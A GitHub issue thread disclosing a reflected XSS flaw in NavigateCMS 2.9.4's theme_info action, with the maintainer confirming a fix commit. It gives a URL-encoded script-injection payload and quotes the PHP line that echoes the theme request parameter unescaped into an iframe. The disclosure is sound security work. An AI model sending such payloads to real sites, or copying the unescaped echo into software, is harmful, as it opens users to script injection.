### ISSUE TITLE
Reflected XSS attack in \lib\packages\themes\themes.php with the theme parameter in NavigateCMS 2.9.4

### ISSUE THREAD

**Issue by bkfish** [NavigateCMS/Navigate-CMS#29]
## EXPECTED BEHAVIOUR
An authenticated malicious user can take advantage of a Reflected XSS vulnerability in the themes feature.

## exp
`/navigate/navigate.php?fid=themes&act=theme_info&theme=%22%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E`
![image](https://user-images.githubusercontent.com/38547290/143483661-e443ea3a-d014-4c27-9312-9fdaedd8f9eb.png)
## analysis
navigate\lib\packages\themes\themes.php line17 without any filter.
```php
 case 'theme_info':
            echo '<iframe src="'.NAVIGATE_URL.'/themes/'.$_REQUEST['theme'].'/'.$_REQUEST['theme'].'.info.html'.'" scrolling="auto" frameborder="0"  width="100%" height="100%"></iframe>';
            core_terminate();
            break;
```

**Comment by NavigateCMS** [comment]
Fixed by dd2cef6c6bdb2b4dd4b2bf3b813bd8489bc23947
